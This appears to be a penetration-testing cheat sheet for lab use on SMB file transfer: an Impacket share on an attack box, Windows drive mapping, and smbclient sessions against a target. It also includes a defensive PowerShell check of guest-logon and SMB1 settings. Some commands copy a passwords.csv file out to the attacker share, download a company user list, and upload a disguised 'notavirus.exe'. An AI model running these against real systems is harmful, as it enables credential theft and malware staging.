
SMB

SMB Server on Attack Box

For this, we can use Impacket's smbserver.py script to run an ad-hoc SMB server. There are two required arguments:

  • Share Name
  • Share Path

You can also configure the SMB server with:

  • Username + Password authentication
  • NTLM hash authentication
  • Specific IP binding
  • Specific port binding (TCP/445 is default)
  • And more...

Impacket SMB Server

The Kali Linux developers have created a series of wrappers around the Impacket scripts. In this case, you can invoke smbserver.py by running impacket-smbserver.

impacket-smbserver -h

smbserver.py help output

impacket-smbserver -smb2support EvilShare /tmp

Serve an anonymous SMB share called "EvilShare" from the /tmp directory on the attack box

impacket-smbserver -smb2support -username 'secretuser' -password 'secretpass' EvilShare /tmp

Serve a credentialed SMB share called "EvilShare" from the /tmp directory on the attack box



Windows Client

cmd.exe

Map the Share

Map the Share Anonymously

Not supported by default on most current versions of Windows: the SMB2/SMB3 client rejects guest (unauthenticated) logons unless the "insecure guest logons" policy has been enabled

net use Z: \\kali.cyber.range\EvilShare

Map "EvilShare" from Attack Box to drive Z:

Map the Share with Credentials

See above for command to start SMB server on attack box with credentials

net use Z: \\attackbox-ip-address\EvilShare secretpass /user:secretuser

Map "EvilShare" from Attack Box to drive Z: with required credentials (cmd.exe does not treat single quotes as quoting, so the password is passed as a bare positional argument)


Interacting with the Share
dir Z:\

With "EvilShare" mapped to Z:, list the contents of the share

dir Z:\filename.txt

List filename.txt in the share

copy Z:\filename.txt C:\Windows\Temp\filename.txt

Copy filename.txt to the system temporary directory

copy C:\Users\john.doe\passwords.csv Z:\

Copy passwords.csv to the share



powershell.exe

PowerShell "SmbShare" Module
  • Requires PowerShell v5+ and Windows 10 or newer
  • See PSDrive cmdlets below for older clients
  • PowerShell supports legacy cmd binaries, so net use is also an option

Map the Share Anonymously

Not supported by default on most current versions of Windows: the SMB2/SMB3 client rejects guest (unauthenticated) logons unless the "insecure guest logons" policy has been enabled

New-SmbMapping -LocalPath 'Z:' -RemotePath \\kali.cyber.range\EvilShare

Map "EvilShare" from Attack Box to drive Z:

Map the Share with Credentials

See above for command to start SMB server on attack box with credentials

New-SmbMapping -LocalPath 'Z:' -RemotePath \\kali.cyber.range\EvilShare -UserName 'secretuser' -Password 'secretpass'

Map "EvilShare" from Attack Box to drive Z: with required credentials

Disconnect the Share

Remove-SmbMapping -LocalPath 'Z:' -Force
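The anonymous-mapping note above is enforced by client-side settings. The following is an added example, not part of the original cheat sheet, that reports those settings so an administrator can see why a guest mapping is refused and which direction to harden; it assumes the SmbShare module (Windows 10 / Server 2016 or newer) and an elevated prompt for the registry and optional-feature queries.

```powershell
# Added example (not from the original page): report the client settings that
# decide whether a guest/anonymous SMB mapping is allowed.
function Get-SmbGuestAccessPosture {
    [CmdletBinding()]
    param()

    # SMB2/SMB3 clients reject guest logons while this is $false (the default).
    $clientCfg   = Get-SmbClientConfiguration
    $guestLogons = $clientCfg.EnableInsecureGuestLogons

    # The "Enable insecure guest logons" Group Policy writes this value; a
    # missing value means the built-in default (disabled) applies.
    $regPath  = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters'
    $regValue = (Get-ItemProperty -Path $regPath -Name 'AllowInsecureGuestAuth' `
                 -ErrorAction SilentlyContinue).AllowInsecureGuestAuth

    # SMB1 has no guest restriction and no encryption; flag the client feature
    # if it is still installed on this host.
    $smb1 = Get-WindowsOptionalFeature -Online -FeatureName 'SMB1Protocol-Client' `
            -ErrorAction SilentlyContinue

    [pscustomobject]@{
        InsecureGuestLogonsEnabled = [bool]$guestLogons
        AllowInsecureGuestAuthReg  = $regValue
        Smb1ClientInstalled        = [bool]($smb1 -and $smb1.State -eq 'Enabled')
        RequireSecuritySignature   = $clientCfg.RequireSecuritySignature
    }
}

# Show the current posture; the commented lines below move it in the hardening
# direction only (guest logons off, SMB1 client removed).
Get-SmbGuestAccessPosture
# Set-SmbClientConfiguration -EnableInsecureGuestLogons $false -Force
# Disable-WindowsOptionalFeature -Online -FeatureName 'SMB1Protocol-Client' -NoRestart
```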


PowerShell "PSDrive" Cmdlets

Map the Share Anonymously

Not supported by default on most current versions of Windows: the SMB2/SMB3 client rejects guest (unauthenticated) logons unless the "insecure guest logons" policy has been enabled

New-PSDrive -Name 'Z' -PSProvider FileSystem -Root \\attackbox-ip-address\EvilShare

Map "EvilShare" from Attack Box to drive Z:

Map the Share with Credentials

See above for command to start SMB server on attack box with credentials

$username = 'secretuser'
$password = 'secretpass' | ConvertTo-SecureString -AsPlainText -Force
$credential = New-Object PSCredential -ArgumentList $username,$password
New-PSDrive -Name 'Z' -PSProvider FileSystem -Root \\attackbox-ip-address\EvilShare -Credential $credential

Map "EvilShare" from Attack Box to drive Z: with required credentials

Disconnect the Share

Remove-PSDrive -Name 'Z'


Interacting with the Share
Get-ChildItem Z:\

With "EvilShare" mapped to Z:, list the contents of the share

Get-ChildItem Z:\filename.txt

List filename.txt in the share

Copy-Item Z:\filename.txt C:\Windows\Temp\filename.txt

Copy filename.txt to the system temporary directory

Copy-Item C:\Users\john.doe\passwords.csv Z:\

Copy passwords.csv to the share


SMB Server on Target

Attack Box as Client

Null Session

smbclient -N -L //target-ip-address --option="client min protocol=core"

Attempt a null-session listing of shares (the client min protocol=core option lets smbclient negotiate down to SMB1 when the target offers nothing newer)

smbclient -N //target-ip-address/HRDrive --option="client min protocol=core"

Open the "HRDrive" share from the target with a null session


Anonymous Authentication

smbclient -L //target-ip-address -U '' --option="client min protocol=core"

Attempt to list any available shares anonymously

smbclient //target-ip-address/HRDrive -U '' --option="client min protocol=core"

Open the "HRDrive" share from the target anonymously

Credentialed Authentication

For local authentication, remove the DOMAIN.TLD/ prefix

smbclient -L //target-ip-address -U 'DOMAIN.TLD/username%password' --option="client min protocol=core"

List shares on the server using a username and password

smbclient //target-ip-address/HRDrive -U 'DOMAIN.TLD/username%password' --option="client min protocol=core"

Open the "HRDrive" share from the target with username and password

Interacting with the Share

smb: \> ls

List contents of the "HRDrive" share

smb: \> get company_users.csv /tmp/company_users.csv

Download the company_users.csv file from the share to the /tmp folder locally (get takes an optional local file name, not a directory)

smb: \> put /tmp/notavirus.exe notavirus.exe

Copy the file notavirus.exe from /tmp locally to the "HRDrive" share